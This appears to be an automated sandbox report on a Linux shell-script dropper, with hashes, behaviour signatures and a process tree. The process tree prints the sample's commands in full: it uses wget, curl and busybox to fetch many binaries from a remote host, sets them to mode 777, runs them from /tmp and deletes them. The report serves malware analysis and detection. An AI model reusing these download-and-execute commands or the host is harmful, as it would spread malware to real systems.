Analysis
-
max time kernel
85s -
max time network
86s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
-
Size
10KB
-
MD5
04d0449c41da21e91fcff668642e400d
-
SHA1
2a7724ac4a33aef57e864b4ab2ba41126ab9d3c0
-
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
-
SHA512
5c0f07e89ce67dfddfc6e90649fe73b20d8f460fd230aa8a787e68c8bafa8ac1acd949b497d7a0b0b55512ce9910ea9ea43bec6f80131074b11222c8fdab2094
-
SSDEEP
192:I5OQ49pUXvxwks6Pk+Y+k+j+2+e+Z7HTgG+HB6HTgGwNPk9pUXvfwks64+Y+k+j+:I5OQN6N+HB4wNPM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 750 chmod 940 chmod 968 chmod 982 chmod 853 chmod 884 chmod 954 chmod 898 chmod 905 chmod 912 chmod 947 chmod 961 chmod 989 chmod 1010 chmod 877 chmod 891 chmod 996 chmod 832 chmod 933 chmod 1003 chmod 1017 chmod 846 chmod 860 chmod 919 chmod 926 chmod 839 chmod 870 chmod 975 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 751 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 833 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 840 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 847 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 854 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 861 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 871 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 878 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 885 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 892 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 899 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 906 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 913 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 920 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 927 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 934 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 941 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 948 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 955 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 962 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 969 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 976 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 983 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 990 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 997 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 1004 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 1011 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 1018 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 951 curl 993 curl 835 wget 915 wget 1009 busybox 981 busybox 992 wget 739 curl 916 curl 936 wget 944 curl 883 busybox 887 wget 908 wget 909 curl 922 wget 930 curl 957 wget 979 curl 985 wget 988 busybox 873 wget 888 curl 943 wget 953 busybox 894 wget 923 curl 925 busybox 929 wget 749 busybox 857 curl 863 wget 890 busybox 1014 curl 960 busybox 978 wget 986 curl 1013 wget 939 busybox 964 wget 1002 busybox 1007 curl 799 curl 859 busybox 880 wget 902 curl 1016 busybox 850 curl 852 busybox 856 wget 937 curl 869 busybox 874 curl 876 busybox 895 curl 723 wget 831 busybox 838 busybox 965 curl 999 wget 904 busybox 946 busybox 967 busybox 995 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl
Processes
-
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh1⤵PID:718
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:723
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:752
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:753
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:831
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:835
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:845
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:848
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:849
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:897
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:911
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:918
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:932
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
